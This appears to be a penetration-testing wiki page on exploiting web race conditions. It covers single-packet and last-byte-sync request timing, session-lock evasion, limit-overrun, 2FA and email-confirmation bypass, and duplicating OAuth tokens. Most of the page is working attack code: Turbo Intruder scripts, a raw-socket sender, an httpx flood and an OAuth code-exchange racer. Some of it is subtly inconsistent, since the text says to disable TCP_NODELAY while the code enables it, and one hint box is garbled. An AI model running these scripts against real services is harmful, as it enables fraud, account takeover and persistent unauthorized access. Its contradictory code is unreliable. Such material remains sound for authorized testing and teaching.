Race Condition


Exploiting RC

The main problem of abusing RCs is that you need the requests to be processed in parallel with a very small time difference (usually <1ms). In the following section, different solutions are proposed to make this possible.

Single-packet attack (HTTP/2) / Last-byte sync (HTTP/1.1)

HTTP/2 allows sending two requests over a single TCP connection (whereas in HTTP/1.1 they have to be sent sequentially).
The use of a single TCP packet completely eliminates the effect of network jitter, so this clearly has potential for race condition attacks too. However, two requests isn't enough for a reliable race attack due to server-side jitter - variations in the application's request-processing time caused by uncontrollable variables like CPU contention.

But, using the HTTP/1.1 'last-byte sync' technique, it's possible to pre-send the bulk of the data, withholding a tiny fragment from each request, and then 'complete' 20-30 requests with a single TCP packet.

To pre-send the bulk of each request:

  • If the request has no body, send all the headers, but don't set the END_STREAM flag. Withhold an empty data frame with END_STREAM set.
  • If the request has a body, send the headers and all the body data except the final byte. Withhold a data frame containing the final byte.

Next, prepare to send the final frames:

  • Wait for 100ms to ensure the initial frames have been sent.
  • Ensure TCP_NODELAY is disabled - it's crucial that Nagle's algorithm batches the final frames.
  • Send a ping packet to warm the local connection. If you don't do this, the OS network stack will place the first final-frame in a separate packet.

Finally, send the withheld frames. You should be able to verify that they landed in a single packet using Wireshark.

{% hint style="info" %} Note that It doesn't work for static files on certain servers but as static files aren't relevant to race condition attacks. But static files are irrelevant for RC attacks. {% endhint %}

Using this technique, you can make 20-30 requests arrive at the server simultaneously, regardless of network jitter.
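
As a rough illustration of the HTTP/1.1 last-byte sync idea (a sketch only; the host, port and request below are placeholder assumptions, not a specific target), you can pre-send everything except the final byte on several connections and then release the withheld bytes back-to-back:

```python
import socket
import time

HOST, PORT = "target.example", 80          # placeholder target
REQUEST = (
    "POST /endpoint HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Length: 1\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
    "X"                                    # 1-byte body; the final byte is withheld below
)

# open the connections and pre-send everything except the final byte
sockets = []
for _ in range(20):
    s = socket.create_connection((HOST, PORT))
    s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
    s.sendall(REQUEST[:-1].encode())
    sockets.append(s)

# give the pre-sent fragments time to reach the server
time.sleep(0.1)

# release the withheld final byte on every connection back-to-back
for s in sockets:
    s.send(REQUEST[-1].encode())

# collect the responses
for s in sockets:
    print(s.recv(4096)[:100])
    s.close()
```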

Adapting to the target architecture

It's worth noting that many applications sit behind a front-end server, and these may decide to forward some requests over existing connections to the back-end, and to create fresh connections for others.

As a result, it's important not to attribute inconsistent request timing to application behaviour such as locking mechanisms that only allow a single thread to access a resource at a time. Also, front-end request routing is often done on a per-connection basis, so you may be able to smooth request timing by performing server-side connection warming - sending a few inconsequential requests down your connection before performing the attack (this just means sending several requests before starting the actual attack).
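
For example, in Turbo Intruder a warm-up could look something like this (a sketch only; the warm-up request, host and request counts are assumptions):

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)

    # hypothetical inconsequential request used only to warm the connection
    warmupReq = '''GET / HTTP/2
Host: example.com

'''
    # send a couple of ungated warm-up requests down the connection first
    for _ in range(2):
        engine.queue(warmupReq)

    # then queue the gated attack requests as usual
    for _ in range(20):
        engine.queue(target.req, gate='race1')

    engine.openGate('race1')
```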

Session-based locking mechanisms

Some frameworks attempt to prevent accidental data corruption by using some form of request locking. For example, PHP's native session handler module only processes one request per session at a time.

It's extremely important to spot this kind of behaviour as it can otherwise mask trivially exploitable vulnerabilities. If you notice that all of your requests are being processed sequentially, try sending each of them using a different session token.
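
For example, with Turbo Intruder you could mark the session cookie value in the request with %s and queue each gated request with a different pre-generated session token (a sketch; the token values below are placeholders you would need to generate yourself):

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)

    # one pre-generated session token per request, so a per-session lock
    # (e.g. PHP's session handler) can't serialize the processing
    sessions = ['<session_id_1>', '<session_id_2>', '<session_id_3>']
    for s in sessions:
        engine.queue(target.req, s, gate='race1')

    engine.openGate('race1')
```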

Abusing rate or resource limits

If connection warming doesn't make any difference, there are various solutions to this problem.

Using Turbo Intruder, you can introduce a short client-side delay. However, as this involves splitting your actual attack requests across multiple TCP packets, you won't be able to use the single-packet attack technique. As a result, on high-jitter targets, the attack is unlikely to work reliably regardless of what delay you set.

Instead, you may be able to solve this problem by abusing a common security feature.

Web servers often delay the processing of requests if too many are sent too quickly. By sending a large number of dummy requests to intentionally trigger the rate or resource limit, you may be able to cause a suitable server-side delay. This makes the single-packet attack viable even when delayed execution is required.
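
A rough sketch of one way this might be structured in Turbo Intruder (the dummy request, host and request counts are assumptions, not a recipe from the original research):

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)

    # hypothetical throwaway request whose only purpose is to trip the limit
    dummyReq = '''GET /?dummy=1 HTTP/2
Host: example.com

'''
    # burst of dummy requests to trigger the rate/resource limit and
    # introduce a server-side delay
    for _ in range(50):
        engine.queue(dummyReq, gate='race1')

    # the actual attack requests, released in the same gate
    for _ in range(20):
        engine.queue(target.req, gate='race1')

    engine.openGate('race1')
```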

{% hint style="warning" %} For more information about this technique check the original report in https://portswigger.net/research/smashing-the-state-machine {% endhint %}

Attack Examples

  • Turbo Intruder - HTTP2 single-packet attack (1 endpoint): You can send the request to Turbo Intruder (Extensions -> Turbo Intruder -> Send to Turbo Intruder), replace in the request the value you want to brute force with %s, as in csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s, and then select examples/race-single-packet-attack.py from the drop-down:

If you are going to send different values, you could modify the code with this one, which uses a wordlist from the clipboard:

    passwords = wordlists.clipboard
    for password in passwords:
        engine.queue(target.req, password, gate='race1')

{% hint style="warning" %} If the web doesn't support HTTP2 (only HTTP1.1) use Engine.THREADED or Engine.BURP instead of Engine.BURP2. {% endhint %}

  • Turbo Intruder - HTTP2 single-packet attack (Several endpoints): In case you need to send a request to 1 endpoint and then multiple requests to other endpoints to trigger the RC, you can change the race-single-packet-attack.py script with something like:
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )
    
    # Hardcode the second request for the RC
    confirmationReq = '''POST /confirm?token[]= HTTP/2
Host: 0a9c00370490e77e837419c4005900d0.web-security-academy.net
Cookie: phpsessionid=MpDEOYRvaNT1OAm0OtAsmLZ91iDfISLU
Content-Length: 0

'''
    
    # For each attempt (20 in total) send 50 confirmation requests.
    for attempt in range(20):
        currentAttempt = str(attempt)
        username = 'aUser' + currentAttempt
    
        # queue a single registration request
        engine.queue(target.req, username, gate=currentAttempt)
        
        # queue 50 confirmation requests - note that these will probably be sent in two separate packets
        for i in range(50):
            engine.queue(confirmationReq, gate=currentAttempt)
        
        # send all the queued requests for this attempt
        engine.openGate(currentAttempt)
  • It's also available in Repeater via the new 'Send group in parallel' option in Burp Suite.
    • For limit-overrun, you could just add the same request 50 times in the group.
    • For connection warming, you could add at the beginning of the group a few requests to some non-static part of the web server.
    • For delaying the processing between one request and another in a flow with 2 substate steps, you could add extra requests between them.
    • For a multi-endpoint RC, you could start by sending the request that reaches the hidden state and then 50 requests right after it that exploit that hidden state.

Raw BF

Before the previous research, these were some of the payloads used, which simply tried to send the packets as fast as possible to cause an RC.

  • Repeater: Check the examples from the previous section.
  • Intruder: Send the request to Intruder, set the number of threads to 30 in the Options menu, select Null payloads as the payload type and generate 30 of them.
  • Turbo Intruder
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           pipeline=False
                           )
    a = ['Session=<session_id_1>','Session=<session_id_2>','Session=<session_id_3>']
    for i in range(len(a)):
        engine.queue(target.req,a[i], gate='race1')
    # open TCP connections and send partial requests
    engine.start(timeout=10)
    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)
  • Python - asyncio
import asyncio
import httpx

async def use_code(client):
    resp = await client.post(f'http://victim.com', cookies={"session": "asdasdasd"}, data={"code": "123123123"})
    return resp.text

async def main():
    async with httpx.AsyncClient() as client:
        tasks = []
        for _ in range(20): #20 times
            tasks.append(asyncio.ensure_future(use_code(client)))
        
        # Get responses
        results = await asyncio.gather(*tasks, return_exceptions=True)
        
        # Print results
        for r in results:
            print(r)
        
        # Brief pause before the client is closed
        await asyncio.sleep(0.5)
    print(results)

asyncio.run(main())

RC Methodology

Limit-overrun / TOCTOU

This is the most basic type of race condition: vulnerabilities that appear in places that limit the number of times you can perform an action, like using the same discount code in a web store several times. A very easy example can be found in this report or in this bug.

There are many variations of this kind of attack, including:

  • Redeeming a gift card multiple times
  • Rating a product multiple times
  • Withdrawing or transferring cash in excess of your account balance
  • Reusing a single CAPTCHA solution
  • Bypassing an anti-brute-force rate limit

Hidden substates

Other, more complicated RCs exploit sub-states in the machine state that could allow an attacker to abuse states they were never meant to have access to, taking advantage of the small window during which those states exist.

  1. Predict potential hidden & interesting substates

The first step is to identify all the endpoints that either write to that state, or read data from it and then use that data for something important. For example, users might be stored in a database table that is modified by registration, profile edits, password reset initiation, and password reset completion.

We can use three key questions to rule out endpoints that are unlikely to cause collisions. For each object and the associated endpoints, ask:

  • How is the state stored?

Data that's stored in a persistent server-side data structure is ideal for exploitation. Some endpoints store their state entirely client-side, such as password resets that work by emailing a JWT - these can be safely skipped.

Applications will often store some state in the user session. Sessions are often somewhat protected against sub-state issues - more on that later.

  • Are we editing or appending?

Operations that edit existing data (such as changing an account's primary email address) have ample collision potential, whereas actions that simply append to existing data (such as adding an additional email address) are unlikely to be vulnerable to anything other than limit-overrun attacks.

  • What's the operation keyed on?

Most endpoints operate on a specific record, which is looked up using a 'key', such as a username, password reset token, or filename. For a successful attack, we need two operations that use the same key. For example, picture two plausible password reset implementations: one that keys the pending reset on the user's session, and another that keys it on the random token itself.
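
A minimal pseudo-code sketch of the two variants (the function and variable names are illustrative assumptions, not the original research's example):

```python
# Variant A: reset state keyed on the session - two resets raced in the
# same session can overwrite each other's sub-state, e.g. mixing your
# reset token with the victim's username.
def request_reset_a(session, username):
    session['reset_user'] = username
    session['reset_token'] = generate_token()
    send_email(username, session['reset_token'])

# Variant B: reset state keyed on the random token itself - parallel
# requests write to different keys, so there is nothing to collide on.
def request_reset_b(username):
    token = generate_token()
    pending_resets[token] = username
    send_email(username, token)
```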

  2. Probe for clues

At this point it's time to launch some RC attacks against the potentially interesting endpoints to try to find unexpected results compared to the regular ones. Any deviation from the expected response, such as a change in one or more responses, or a second-order effect like different email contents or a visible change in your session, could be a clue indicating something is wrong.

  3. Prove the concept

The final step is to prove the concept and turn it into a viable attack.

When you send a batch of requests, you may find that an early request pair triggers a vulnerable end-state, but later requests overwrite/invalidate it and the final state is unexploitable. In this scenario, you'll want to eliminate all unnecessary requests - two should be sufficient for exploiting most vulnerabilities. However, dropping to two requests will make the attack more timing-sensitive, so you may need to retry the attack multiple times or automate it.

Time Sensitive Attacks

Sometimes you may not find race conditions, but the techniques for delivering requests with precise timing can still reveal the presence of other vulnerabilities.

One such example is when high-resolution timestamps are used instead of cryptographically secure random strings to generate security tokens.

Consider a password reset token that is only randomized using a timestamp. In this case, it might be possible to trigger two password resets for two different users, which both use the same token. All you need to do is time the requests so that they generate the same timestamp.
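
A sketch of the kind of vulnerable token generation this refers to (purely illustrative):

```python
import hashlib
import time

def generate_reset_token():
    # vulnerable: the token depends only on the current timestamp, so two
    # resets processed within the same timestamp window get the same token
    return hashlib.md5(str(int(time.time())).encode()).hexdigest()
```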

{% hint style="warning" %} To confirm for example the previous situation you could just ask for 2 reset password tokens at the same time (using single packet attack) and check if they are the same. {% endhint %}

Check the example in this lab.

Hidden substates case studies

Pay & add an Item

Check this lab to see how to pay in a store and add an extra item that you won't need to pay for.

Confirm other emails

The idea is to verify an email address and change it to a different one at the same time, to find out whether the platform ends up verifying the new, unconfirmed one.

According to this writeup, GitLab was vulnerable to a takeover this way because it might send the email verification token of one email address to the other one.

You can also check this lab to learn about this.

Hidden Database states / Confirmation Bypass

If 2 different writes are used to add information to a database, there is a small window of time where only the first piece of data has been written. For example, when creating a user, the username and password might be written first and only then the token to confirm the newly created account. This means that for a short time the token to confirm an account is null.

Therefore, registering an account and sending several requests with an empty token (token=, token[]= or any other variation) to confirm the account right away could allow you to confirm an account whose email you don't control.

Check this lab for an example.

Bypass 2FA

The following pseudo-code demonstrates how a website could be vulnerable to a race variation of this attack:

session['userid'] = user.userid
if user.mfa_enabled:
    session['enforce_mfa'] = True
    # generate and send MFA code to user
    # redirect browser to MFA code entry form

As you can see, this is in fact a multi-step sequence within the span of a single request. Most importantly, it transitions through a sub-state in which the user temporarily has a valid logged-in session, but MFA isn't yet being enforced. An attacker could potentially exploit this by sending a login request along with a request to a sensitive, authenticated endpoint.
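
A sketch of how that could be attempted with Turbo Intruder (the sensitive endpoint, host, cookie and request counts are assumptions): race the login request against requests to an authenticated endpoint so the latter land in the window before enforce_mfa is set.

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)

    # hypothetical request to a sensitive, authenticated endpoint, using the
    # same (pre-login) session cookie that the login request will upgrade
    sensitiveReq = '''GET /my-account HTTP/2
Host: example.com
Cookie: session=<same session cookie as the login request>

'''
    # race the login (target.req) against the sensitive requests
    engine.queue(target.req, gate='race1')
    for _ in range(10):
        engine.queue(sensitiveReq, gate='race1')

    engine.openGate('race1')
```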

OAuth2 eternal persistence

There are several OAuth providers. These services allow you to create an application and authenticate users that the provider has registered. In order to do so, the client will need to permit your application to access some of their data inside the OAuth provider.
So, up to here this is just a common login with Google/LinkedIn/GitHub... where you are prompted with a page saying: "Application <InsertCoolName> wants to access your information, do you want to allow it?"

Race Condition in authorization_code

The problem appears when you accept it and an authorization_code is automatically sent to the malicious application. Then, this application abuses a race condition in the OAuth service provider to generate more than one AT/RT (Access Token/Refresh Token) from the authorization_code for your account. Basically, it abuses the fact that you accepted the application's access to your data to create several AT/RT pairs. Then, if you stop allowing the application to access your data, one AT/RT pair will be deleted, but the other ones will still be valid.
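
A minimal sketch of what racing the code exchange could look like with httpx (the token endpoint, client credentials and the captured authorization_code are placeholders):

```python
import asyncio
import httpx

TOKEN_URL = "https://oauth.provider.example/token"   # placeholder token endpoint
DATA = {
    "grant_type": "authorization_code",
    "code": "<captured authorization_code>",
    "client_id": "<client_id>",
    "client_secret": "<client_secret>",
    "redirect_uri": "https://attacker.example/callback",
}

async def exchange(client):
    # every coroutine redeems the same single-use authorization_code
    resp = await client.post(TOKEN_URL, data=DATA)
    return resp.status_code, resp.text

async def main():
    async with httpx.AsyncClient() as client:
        results = await asyncio.gather(*(exchange(client) for _ in range(20)))
    # more than one successful response means several AT/RT pairs were issued
    for status, body in results:
        print(status, body[:200])

asyncio.run(main())
```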

Race Condition in Refresh Token

Once you have obtained a valid RT, you could try to abuse it to generate several AT/RT pairs; even if the user revokes the malicious application's permission to access his data, several RTs will still remain valid.

RC in WebSockets

In WS_RaceCondition_PoC you can find a PoC in Java for sending WebSocket messages in parallel to abuse race conditions in WebSockets as well.
